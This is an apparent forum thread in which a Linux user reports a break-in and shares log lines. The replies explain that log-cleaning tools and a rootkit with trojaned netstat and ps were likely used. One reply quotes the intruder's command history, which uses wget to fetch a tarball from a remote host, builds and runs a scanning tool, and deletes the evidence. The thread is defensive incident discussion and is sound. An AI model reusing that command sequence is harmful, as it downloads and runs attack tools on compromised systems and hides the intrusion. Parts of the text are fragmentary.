Well, I have been hacked and my /var/log/messages has next to nothing in it. I am keen on getting to this person who did it. Fortunely I have not lost a lot any important data. But first the proof that I have been hacked.
/var/log/messages
(This is the first line) Nov 18 02:22:53 munshi userdel[8048]: delete user `ftp' Nov 18 02:22:53 munshi userdel[8048]: remove group `ftp' Nov 18 06:24:41 munshi ddclient[23392]: WARNING: cannot connect to checkip.dyn$Nov 18 06:32:21 munshi ddclient[23392]: WARNING: cannot connect to checkip.dyn$Nov 18 06:40:01 munshi ddclient[23392]: WARNING: cannot connect to checkip.dyn$
there r tools available for crackers to clean up logs after break in .... might b possible that ur *cracker* also run some kinda tool to remove logs
cd /dev/ida/.sys/trojan wget www.geocities.com/master0n/bestwu.tgz tar zxvf bestwu.tgz cd aw make ./awu 24.132 cd .. lsd ls rm -rf aw bestwu.tgz
this is a rootkit..... to check with which rootkit was installed on ur machine visit
. netstat -a, ps ax are not working since
These files r replaced with trojaned ones by rootkit ... so there is possibility that they show u wrong results or malfunction ...
Please help me to find the person who did this. Thanks in advance.
forensic analysis .....
regards Ranjeet